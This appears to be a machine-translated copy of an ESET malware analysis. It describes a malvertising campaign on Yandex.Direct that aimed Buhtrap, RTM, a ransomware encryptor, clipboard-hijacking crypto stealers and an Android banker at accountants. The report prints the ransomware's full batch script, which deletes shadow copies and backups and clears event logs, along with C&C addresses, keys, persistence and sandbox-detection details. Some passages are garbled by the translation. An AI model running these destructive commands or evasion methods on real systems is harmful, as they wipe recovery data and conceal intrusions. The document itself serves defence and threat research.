The backdoor and the Buhtrap encryptor were distributed using Yandex.Direct

    To target a cyber attack on accountants, you can use the working documents that they are looking for on the network. Something like this in the past few months has been a cyber group that distributes the well-known backdoors Buhtrap and RTM , as well as encryptors and software to steal cryptocurrencies. Most targets are located in Russia. The attack is implemented by placing malicious ads in Yandex.Direct. Potential victims went to a site where they were asked to download a malicious file disguised as a document template. Yandex removed malicious ads after our warning.

    Buhtrap source code has been merged into the network in the past, so anyone can use it. We do not have information regarding the availability of RTM code.

    In a post, we’ll tell how attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post will be completed by a technical analysis of the malvari.

    Buhtrap and RTM back in business

    Distribution mechanism and victims

    The various payloads delivered to victims are united by a common distribution mechanism. All malicious files created by cybercriminals were located in two different GitHub repositories.

    Usually, the repository contained one downloadable malicious file, which often changed. Since you can see the history of changes in the repository on GitHub, we see what kind of malware spread during a certain period. To convince the victim to download a malicious file, the site blanki-shabloni24 [.] Ru, shown in the figure above, was used.

    The design of the site and all the names of the malicious files are consistent in a single concept - forms, templates, contracts, samples, etc. Given that in the past Buhtrap and RTM software were already used in attacks on accountants, we assumed that the strategy is the same in the new campaign. The only question is how the victim got on the site of the attackers.


    At least a few potential victims on this site were attracted by malicious advertising. The following is an example URL:|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&

    As you can see from the link, the banner was posted on the legitimate accounting forum bb.f2 [.] Kz. It is important to note that banners appeared on different sites, everyone had the same campaign id (blanki_rsya), and most related to accounting or legal assistance services. It can be seen from the URL that the potential victim used the request “download account form”, which reinforces our hypothesis about targeted attacks. Listed below are the sites on which banners and related searches appeared.

    • download the invoice form - bb.f2 [.] kz
    • sample contract - Ipopen [.] en
    • statement complaint sample - 77metrov [.] ru
    • contract form - blank-dogovor-kupli-prodazhi [.] en
    • petition sample - [.] ru
    • sample complaint - yurday [.] en
    • sample contract forms - Regforum [.] en
    • contract form - assistentus [.] en
    • sample apartment agreement - napravah [.] com
    • samples of legal contracts - avito [.] ru

    The blanki-shabloni24 [.] Ru site may have been set up to go through a simple visual assessment. As a rule, advertising leading to a professional looking site with a link to GitHub does not look like something obviously bad. In addition, attackers uploaded malicious files to the repository only for a limited period, probably for the duration of the campaign. Most of the repository on GitHub was an empty zip archive or a clean exe file. Thus, attackers could distribute advertising through Yandex.Direct on sites that were most likely visited by accountants who came for specific search queries.

    Next, consider the various payloads distributed in this way.

    Payload Analysis

    Distribution Timeline

    The malware campaign began at the end of October 2018 and is active at the time of writing the post. Since the entire repository was publicly available on GitHub, we compiled an accurate chronology of the distribution of six different malware families (see the figure below). We added a line showing the moment a banner link was detected, according to ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by our lack of part of the change history, since the repository was deleted from GitHub before we could get it completely.

    Figure 1. Chronology of the distribution of malvari.

    Certificate Signing Certificates

    The campaign used a lot of certificates. Some have signed more than one family of malware, which additionally indicates that different samples belong to the same campaign. Despite the availability of the private key, the operators did not sign the binary files systematically and did not use the key for all samples. At the end of February 2019, attackers began to create invalid signatures using a certificate owned by Google, to which they do not have a private key.

    All the certificates involved in the campaign and the Malvari families they sign are listed in the table below.

    We also used these code signing certificates to communicate with other families of malware. For most certificates, we did not find samples that would not be distributed through the GitHub repository. However, the TOV “MARIYA” certificate was used to sign the Malvari, owned by the Wauchos botnet , adware and miners. This malware is unlikely to be associated with this campaign. Most likely, the certificate was purchased on the darknet.

    Win32 / Filecoder.Buhtrap

    The first component that caught our attention was the first discovered Win32 / Filecoder.Buhtrap. This is a binary file in Delphi, which is sometimes packaged. It was mainly distributed in February – March 2019. It behaves as it should a ransomware program - it searches for local disks and network folders and encrypts the detected files. To compromise, he does not need an Internet connection, since he does not contact the server to send encryption keys. Instead, he adds a “token” at the end of the buyback message, and suggests using email or Bitmessage to communicate with operators.

    To encrypt as many important resources as possible, Filecoder.Buhtrap launches a stream designed to shut down key software, which may have open file handlers with valuable information, which can interfere with encryption. Target processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery difficult. To do this, the batch script below is executed. Filecoder.Buhtrap uses the legitimate online service IP Logger, created to collect information about site visitors. This is intended to track the victims of the encoder, for which the command line is responsible:

    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit /set {default} recoveryenabled no
    wbadmin delete catalog -quiet
    wbadmin delete systemstatebackup
    wbadmin delete systemstatebackup -keepversions:0
    wbadmin delete backup
    wmic shadowcopy delete
    vssadmin delete shadows /all /quiet
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    attrib "%userprofile%\documents\Default.rdp" -s -h
    del "%userprofile%\documents\Default.rdp"
    wevtutil.exe clear-log Application
    wevtutil.exe clear-log Security
    wevtutil.exe clear-log System
    sc config eventlog start=disabled

    mshta.exe "javascript:document.write('');"

    Files for encryption are selected in case of mismatch on the three exception lists. Firstly, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Secondly, all files for which the full path contains directory lines from the list below are excluded. Thirdly, certain file names are also excluded from encryption, among them the name of the message file with a ransom demand. The list is presented below. Obviously, all of these exceptions are designed to preserve the ability to start the machine, but with its minimum usability.

    \tor browser\
    \opera software\
    \mozilla firefox\
    \internet explorer\
    \application data\
    \apple computer\safari\
    \all users\
    :\system volume information\

    your files are now encrypted.txt
    windows update assistant.lnk

    File encryption scheme

    Once launched, the malware generates a pair of 512-bit RSA keys. The private exponent (d) and module (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and module), zlib-wrapped, and encoded in base64. The code responsible for this is shown in Figure 2.

    Figure 2. The result of Hex-Rays decompilation of the process of generating a 512-bit RSA key pair.

    The following is an example of plain text with a generated private key, which is a token attached to the ransom message.


    The attackers' public key is shown below.

    e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
    n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

    Files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file, a new key and a new initialization vector are generated. Key information is added to the end of the encrypted file. Consider the encrypted file format.
    Encrypted files have the following header: The

    data of the source file with the addition of the VEGA magic value is encrypted up to the first 0x5000 bytes. All information for decryption is attached to the file with the following structure:

    - The file size marker contains a label indicating whether the file is larger than 0x5000 bytes
    - AES key blob = ZlibCompress (RSAEncrypt (AES key + IV, public key of the generated RSA key pair))
    - RSA key blob = ZlibCompress (RSAEncrypt (generated RSA private key, hard-coded RSA public key))

    Win32 / ClipBanker

    Win32 / ClipBanker is a component that has been distributed intermittently from late October to early December 2018. Its role is to track the contents of the clipboard, it looks for the addresses of cryptocurrency wallets. Having determined the address of the target wallet, ClipBanker replaces it with the address supposedly belonging to the operators. The samples we studied were neither packaged nor obfuscated. The only mechanism used to mask behavior is string encryption. The addresses of the operators' wallets are encrypted using RC4. Target cryptocurrencies - Bitcoin, Bitcoin cash, Dogecoin, Ethereum and Ripple.

    During the spread of the malware, a small amount was sent to the MTC to the attacker's Bitcoin wallets, which casts doubt on the success of the campaign. In addition, there is no reason to assume that these transactions were generally related to ClipBanker.

    Win32 / RTM

    The Win32 / RTM component was distributed for several days in early March 2019. RTM is a Delphi-based banking Trojan targeting remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, the description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM .

    Buhtrap downloader

    For some time, a downloader was available on GitHub, unlike previous Buhtrap tools. He calls to get the next step and loads it directly into memory. Two behaviors of the second stage code can be distinguished. In the first URL, RSS.php passed the Buhtrap backdoor directly - this backdoor is very similar to the one available after the source code leak. Interestingly, we see several campaigns with a Buhtrap backdoor, and presumably they are led by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process, which we talked about earlierhttps://94.100.18[.]67/RSS.php?

    . In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we saw, operators did not care about changing this key.

    The second, more complex behavior - the RSS.php URL was passed by another loader. It implemented some kind of obfuscation, such as rebuilding a dynamic import table. The purpose of the bootloader is to contact the C & C server msiofficeupd [.] Com / api / F27F84EDA4D13B15 / 2, send logs and wait for an answer. It processes the response as a blob, loads it into memory, and executes. The payload we saw when executing this loader was the same Buhtrap backdoor, but there may be other components.

    Android / Spy.Banker

    Interestingly, a component for Android was also found in the GitHub repository. He was in the main branch for only one day - November 1, 2018. In addition to being hosted on GitHub, ESET telemetry does not find evidence of the spread of this malware.

    The component was hosted as an Android Application Package (APK). He is very obfuscated. Malicious behavior is hidden in the encrypted JAR located in the APK. It is RC4-encrypted using this key: The same key and algorithm are used to encrypt strings. JAR is located at . The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field. Having decrypted the file, we found that it is Anubis - a previously documented banker for Android. Malicious software has the following functions:

    key = [
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96

    APK_ROOT + image/files

    • microphone recording
    • taking screenshots
    • obtaining GPS coordinates
    • keylogger
    • device data encryption and ransom demand
    • spamming

    Interestingly, the banker used Twitter as a backup communication channel to get another C&C server. The sample we analyzed used the @JohnesTrader account, but at the time of analysis it was already blocked.

    The banker contains a list of targeted applications on an Android device. It has become longer than the list obtained from the Sophos study. The list contains many banking applications, online shopping programs such as Amazon and eBay, cryptocurrency services.

    MSIL / ClipBanker.IH

    The last component that was distributed as part of this campaign was the .NET Windows executable, which appeared in March 2019. Most of the studied versions were packaged by ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its goal is a wide range of cryptocurrencies, as well as offers on Steam. In addition, it uses the IP Logger service to steal the Bitcoin private WIF key.

    Protection Mechanisms
    In addition to the advantages that ConfuserEx provides in the form of counteracting debugging, dumping and tampering, the component has the ability to detect anti-virus products and virtual machines.

    To check the launch in a virtual machine, the malware uses the Windows built-in WMI command line (WMIC) to request information about the BIOS, namely:

    wmic bios

    Then the program parses the output of the command and searches for keywords: VBOX, VirtualBox, XEN, qemu, bochs, VM.

    To detect antivirus products, malware sends a Windows Management Instrumentation (WMI) request to the Windows Security Center using the ManagementObjectSearcher API as shown below. After decoding from base64, the call looks like this:

    ManagementObjectSearcher('root\\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

    Figure 3. The process of determining anti-virus products.

    In addition, the malware checks whether CryptoClipWatcher , a tool for protecting against clipboard attacks, is running and, if it is running, pauses all threads of this process, thereby turning protection off.


    The version of malware that we studied copies itself into %APPDATA%\google\updater.exeand sets the “hidden” attribute for the google directory. Then it changes the value Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shellin the Windows registry and adds the path updater.exe. So malware will be executed every time a user logs in.

    Malicious behavior

    Like ClipBanker, the malware monitors the contents of the clipboard and looks for the addresses of cryptocurrency wallets, and when it finds it, replaces it with one of the operator’s addresses. Below is a list of destination addresses based on what was found in the code.


    For each of the address types there is a corresponding regular expression. The value STEAM_URL is used to attack the Steam system, as can be seen from the regular expression, which is used to determine in the buffer:


    Exfiltration channel

    In addition to replacing addresses in the buffer, the malware targets the private WIF keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses as an exfiltration channel to obtain the WIF private key. To do this, the operators add the private key data to the User-Agent HTTP header, as shown below.

    Figure 4. IP Logger console with output.

    Operators did not use to exfiltrate wallets. They probably resorted to a different method because of the restriction of 255 characters in the field User-Agentdisplayed in the IP Logger web interface. In the samples we studied, another server for outputting data was stored in an environment variableDiscordWebHook. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development, and the variable is assigned on the operator’s test machine.

    There is another sign that the program is in development. The binary includes two URLs, and a request is sent to both when exfiltrating the data. In a request to one of these URLs, the value in the Referer field is preceded by “DEV /”. We also found a version that was not packaged using ConfuserEx, the recipient for this URL is named DevFeedbackUrl. Based on the name of the environment variable, we believe that operators plan to use the legitimate Discord service and its web interception system to steal cryptocurrency wallets.


    This campaign is an example of the use of legitimate advertising services in cyber attacks. The scheme is aimed at Russian organizations, but we will not be surprised to see such an attack using non-Russian services. To avoid compromise, users must be confident in the reputation of the source of the downloaded software.

    A complete list of MITRE ATT & CK indicators of compromise and attributes is available here .

    Also popular now: